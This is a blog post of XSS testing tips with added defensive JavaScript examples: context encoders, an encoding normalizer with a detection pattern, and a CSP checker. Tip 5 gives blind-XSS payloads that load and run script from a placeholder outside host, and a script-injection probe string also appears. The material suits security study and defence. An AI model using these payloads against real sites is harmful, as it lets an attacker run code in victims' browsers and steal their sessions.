This Saturday I'll be sharing experience and techniques at the company, so I've written up some of my own tips plus some collected online, for everyone's convenience and my own:
The usual XSS: stored, reflected, DOM-based.
How it arises is nothing more than where the output point lands: between HTML tags, inside an HTML attribute, inside JS code, or inside CSS code.
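The four output points above each need a different encoder on the defending side; the following is an added example (my own code, not from this post) with one small encoder per context and a render function that places the same untrusted value into all four. The sample input, function names and the HTML fragments are constructed for illustration.

```javascript
// Added example (not from the original post): one encoder per output point.
// The place where untrusted data lands decides which characters are dangerous,
// so the same value needs a different encoder for each of the four contexts.

// Between HTML tags and inside quoted attribute values: entity-encode the
// characters that can open a tag, close an attribute, or end a comment.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Inside a JS string literal: escape everything except [A-Za-z0-9] so that
// neither the closing quote nor a "</script>" sequence can appear literally.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Inside a CSS string: hex escape with a trailing space as terminator, so the
// following character is never swallowed into the escape.
function encodeForCss(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => '\\' + c.charCodeAt(0).toString(16) + ' ');
}

// Render one untrusted value into all four contexts with the matching encoder.
function render(untrusted) {
  return {
    html: '<div>' + encodeForHtml(untrusted) + '</div>',
    attribute: '<input value="' + encodeForHtml(untrusted) + '">',
    js: '<script>var name = "' + encodeForJsString(untrusted) + '";</script>',
    css: '<style>.u::after { content: "' + encodeForCss(untrusted) + '"; }</style>',
  };
}

// Constructed sample input: the classic tag-breaking probe.
const SAMPLE = '"><script>alert(1)</script>';
```

Note that the HTML encoder is not enough for the script context: it leaves `;`, `(` and `)` alone, and the HTML parser does not decode entities inside `<script>`, so the JS string encoder is the one that has to neutralise the quote and the `</` there.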
Here are some of my tips:
1. Look into new tags, such as the new <link rel="import" href="Http://xx"> in newer versions of Chrome; it can be used, see the QQMail XSS on WooYun.
Recommended reference: http://html5sec.org
2. Look into encoding and decoding. HTML: entity encoding, numeric encoding in hexadecimal and decimal. JS: Unicode encoding, hex, octal, plain backslash escapes. CSS: octal, hex.
Use them and you'll get unexpected results :) Recommended tool: http://evilcos.me/lab/xssee/
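The encodings in tip 2 are exactly what a filter or a log rule has to undo before matching, otherwise every encoded form of the same payload slips past. The following is an added example (my own code, not from this post or the xssee tool) that decodes HTML entities, JS string escapes and CSS escapes and applies the decoder that belongs to the output point. The context names, function names and sample strings are constructed for illustration.

```javascript
// Added example (not from the original post): a normalizer that undoes the
// encodings listed in tip 2 so that a detection rule sees what the browser
// will see. Which decoder applies depends on the output point: the HTML
// parser decodes entities between tags and in attributes, but not inside
// <script> or <style>, where the JS and CSS parsers run their own escapes.

const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// HTML: &name; &#DDD; &#xHH; (the browser tolerates a missing semicolon).
function decodeHtmlEntities(s) {
  return s.replace(/&(#x[0-9a-fA-F]+|#[0-9]+|[a-zA-Z]+);?/g, (m, body) => {
    if (body[0] !== '#') return NAMED_ENTITIES[body.toLowerCase()] ?? m;
    const cp = body[1] === 'x' || body[1] === 'X'
      ? parseInt(body.slice(2), 16)
      : parseInt(body.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// JS string escapes: \u{H..}, \uHHHH, \xHH, octal \NNN and \c for any other char.
const JS_ESCAPE = /\\(?:u\{([0-9a-fA-F]{1,6})\}|u([0-9a-fA-F]{4})|x([0-9a-fA-F]{2})|([0-7]{1,3})|(.))/g;
function decodeJsEscapes(s) {
  return s.replace(JS_ESCAPE, (m, uBrace, u4, x2, oct, ch) => {
    if (uBrace !== undefined) {
      const cp = parseInt(uBrace, 16);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    if (u4 !== undefined) return String.fromCharCode(parseInt(u4, 16));
    if (x2 !== undefined) return String.fromCharCode(parseInt(x2, 16));
    if (oct !== undefined) return String.fromCharCode(parseInt(oct, 8));
    return ch; // \" -> ", \/ -> /, ...
  });
}

// CSS: \H{1,6} followed by an optional whitespace terminator, or \c.
function decodeCssEscapes(s) {
  return s.replace(/\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|(.))/g, (m, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
  });
}

// Decoder chain per output point (constructed context names).
const DECODERS = {
  html: [decodeHtmlEntities],
  attribute: [decodeHtmlEntities],
  js: [decodeJsEscapes],
  css: [decodeCssEscapes],
};

function normalize(input, context) {
  return DECODERS[context].reduce((s, decode) => decode(s), input);
}

// Script-like markers are checked after normalization; testing the raw input
// with the same pattern misses every encoded form of the same payload.
const SCRIPT_MARKER = /<\s*script|javascript\s*:|\bon\w+\s*=/i;
function looksLikeScriptInjection(input, context) {
  return SCRIPT_MARKER.test(normalize(input, context));
}
```

The context argument matters in both directions: an entity-encoded `<script>` is a real tag between HTML tags but inert inside a `<script>` block, and a `\x3c` is the reverse, so a rule that decodes everything everywhere produces false positives while one that decodes nothing produces misses.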
3. Some personal feelings and experience (borrowed from Moster's share):
1) Where the UI is ugly, the security is poor too.
2) Think from the programmer's point of view: if you had to write it, which places could not be handled thoroughly?
3) Rookies should go back to old grass: dig more where you found something before, and there may be a surprise.
4) When you find a vulnerability somewhere, Google again to see whether there is a similar business elsewhere.
4. About automation (learned from Chu Niu's ideas):
1) For stored XSS: Last-Modified and ETag
2) For DOM XSS: fuzz + hook
5. Blind XSS: if the page uses jQuery you can try the following (thanks to cosine and pw Niu):
1) eval($.get('//xxxx.com'))
2) $.getScript('//xxx.com') // This one is the best; I hadn't thought of it, pw found it in practice.
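Both of the jQuery one-liners above only work when the page is allowed to fetch and run a script from a foreign origin, and the protocol-relative "//host" form resolves against the page's own scheme. The following is an added example (my own code, not from this post or from jQuery) that checks whether a Content-Security-Policy script-src would let such a fetch through; the policies, page origin and URLs are constructed, and the matching is a simplified version of CSP source expressions (host and scheme sources, 'self', 'none'; no nonces, hashes, paths or default-src fallback).

```javascript
// Added example (not from the original post): decides whether a script-src
// policy would let the browser fetch a given script URL, including the
// protocol-relative "//host" form, which resolves against the page's scheme.
// Assumption: simplified CSP matching, not a full implementation.

function parseScriptSrc(header) {
  const directive = header.split(';')
    .map((d) => d.trim())
    .find((d) => /^script-src(\s|$)/.test(d));
  return directive ? directive.split(/\s+/).slice(1) : null;
}

function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : '80';
}

function sourceAllows(source, url, pageOrigin) {
  const target = new URL(url, pageOrigin); // "//xxx.com/x.js" becomes https://xxx.com/x.js on an https page
  const page = new URL(pageOrigin);
  if (source === "'self'") return target.origin === page.origin;
  if (source.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes: never allow a fetched URL
  if (source === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) return target.protocol === source.toLowerCase();
  // Host source: [scheme://][*.]host[:port|:*]
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:\/*]+)(?::(\d+|\*))?$/i.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    if (target.protocol !== scheme.toLowerCase() + ':') return false;
  } else if (target.protocol !== page.protocol) {
    return false; // scheme-less host source: must match the page's scheme (http->https upgrade not modelled)
  }
  const h = target.hostname.toLowerCase();
  const hostOk = wildcard ? h.endsWith('.' + host.toLowerCase()) : h === host.toLowerCase();
  if (!hostOk) return false;
  if (port === '*') return true;
  const targetPort = target.port || defaultPort(target.protocol);
  return targetPort === (port || defaultPort(target.protocol));
}

function scriptAllowed(header, url, pageOrigin) {
  const sources = parseScriptSrc(header);
  if (sources === null) return true; // no script-src: treated as unrestricted here
  return sources.some((src) => sourceAllows(src, url, pageOrigin));
}

// Constructed policies and page origin: a permissive policy beside a restrictive one.
const WEAK_CSP = "script-src * 'unsafe-inline' 'unsafe-eval'";
const STRICT_CSP = "default-src 'none'; script-src 'self' https://cdn.example.com";
const PAGE = 'https://mail.example.com';
```

Under WEAK_CSP the `$.getScript('//xxx.com')` fetch is allowed; under STRICT_CSP it is refused while the page's own scripts and the listed CDN still load, which is the setting a defender wants to confirm in the response headers.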
If you have other tips, you're welcome to add them; if there's a mistake, feel free to write to sevck#jdsec.com
XSS Tips Roundup